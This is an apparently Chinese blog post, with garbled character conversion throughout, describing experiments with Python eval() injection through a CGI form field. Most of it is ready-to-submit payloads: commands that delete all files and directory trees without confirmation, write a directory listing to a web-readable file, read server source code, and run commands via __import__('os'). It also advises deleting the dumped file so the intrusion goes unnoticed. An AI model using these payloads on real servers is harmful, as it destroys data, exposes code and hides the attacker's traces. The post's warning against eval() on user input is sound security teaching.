一般來(lái)說(shuō)Python的eval()函數(shù)可以把字符串“123”變成數(shù)字類型的123，但是PP3E上說(shuō)它很危險(xiǎn)，還可以執(zhí)行其他命令！

對(duì)此進(jìn)行一些試驗(yàn)。果然，如果python寫的cgi程序中如果使用eval()而非int()來(lái)轉(zhuǎn)換諸如年齡這樣的輸入框中的內(nèi)容時(shí)是非常危險(xiǎn)的。不僅可以看見列出系統(tǒng)的全部文件，還可以執(zhí)行刪除文件，察看文件源代碼等危險(xiǎn)操作！

試著寫了個(gè)程序，想把本地的腳本文件同過(guò)這樣的形式一行一行的寫到服務(wù)器的某個(gè)文件里，可最后失敗在無(wú)法輸入換行符"/n"，在提交的語(yǔ)句里只要有換行符，就會(huì)出現(xiàn)EOL的出錯(cuò)提示，換了編碼方式還是沒(méi)能成功。
 
網(wǎng)頁(yè)里有一個(gè)提交名字的窗口，這里只是以改它為例，否則名字是不會(huì)用eval函數(shù)轉(zhuǎn)換的，不過(guò)年齡到是很容易出問(wèn)題。這個(gè)文件（http://localhost/tutor4.html）導(dǎo)入了os。

line1 = "Hello, %s." % eval(form['user'].value)

（1）

os.system('del * /q') #刪除當(dāng)前目錄下所有文件（不包括文件夾）。

os.system調(diào)用當(dāng)前系統(tǒng)的命令（如windows）

/q
指定強(qiáng)制狀態(tài)。不提示您確認(rèn)刪除。

（2）若刪除文件夾，使用rmdir

/s
刪除指定目錄和所有子目錄以及包含的所有文件。使用 /s 來(lái)刪除目錄樹。

/q
在安靜模式中運(yùn)行 rmdir。不經(jīng)確認(rèn)即刪除目錄。

os.system('rmdir d:/workspace /s/q')

（3）列出所有文件os.system('dir')。因?yàn)槌晒?zhí)行了dir命令后，系統(tǒng)返回0，所以看到的返回內(nèi)容只能是Hello,0.而在服務(wù)器上，倒是真的列出來(lái)了，如果有日志，可能被發(fā)現(xiàn)。提交os.system('dir >dir.txt')，那么訪問(wèn)http://localhost/dir.txt那么所有的文件和文件夾都暴露了，想看源代碼嗎？如果再使用os.system('type target.py').命令如果成功完成同樣會(huì)返回Hello, 0.的。難道再放進(jìn)一個(gè)文件，再訪問(wèn)那個(gè)文件嗎？open('target.py').read()

由此，可以在列出和察看其他文件夾里面的內(nèi)容了。

如果沒(méi)干別的壞事，那么可刪除dir.txt以免被人發(fā)現(xiàn)了。os.system('del dir.txt /q')

導(dǎo)入os并執(zhí)行命令：

__import__('os').system('dir >dir.txt')

最新評(píng)論